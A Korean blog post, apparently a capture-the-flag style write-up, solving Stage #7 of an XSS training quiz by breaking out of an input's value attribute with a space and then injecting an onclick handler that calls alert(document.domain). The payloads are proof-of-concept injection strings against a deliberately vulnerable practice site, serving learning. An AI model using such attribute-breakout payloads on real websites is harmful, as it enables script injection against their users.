-
[XSS Challenges] Stage #7 
처음엔 아무렇게 입력해보았다.
역시나 이렇게 간단하게 문제가 풀릴리가 없다.
여러번 시도를 해보던 중 띄어쓰기를 하면 다음과 같이 스크립트 태그가 value 에서 빠져 나오는 걸 확인할 수 있었다.
<input type="text" name="p1" size="50" value="">" <script>alert(document.domain)<="" script><"="">하지만 소스코드를 보니 쿼터 필터링이 걸려 있었다.
쿼터를 빼주고 코드를 작성해보았다.
" onclick=alert(document.domain);위의 코드를 입력하여 Seach 버튼을 클릭하면 브라우저는 아래와 같이 해석하여 실행하게 된다.
<input type="text" name="p1" size="50" value=""" onclick="alert(document.domain);">입력칸을 다시 눌러주면 onclick 이벤트에 의해 다음과 같이 alert 창이 뜨는 걸 확인할 수 있다.
Stage #7 Clear http://xss-quiz.int21h.jp/stage07.php
'Wargame > XSS Challenges' 카테고리의 다른 글
[XSS Challenges] Stage #8 (0) 2022.02.22 [XSS Challenges] Stage #6 (0) 2022.02.16 [XSS Challenges] Stage #5 (0) 2022.02.15 [XSS Challenges] Stage #4 (0) 2022.02.14 [XSS Challenges] Stage #3 (0) 2022.02.14 댓글
HACKINTOANETWORK
SECURITY RESEARCHER, BUG HUNTER, HACKER
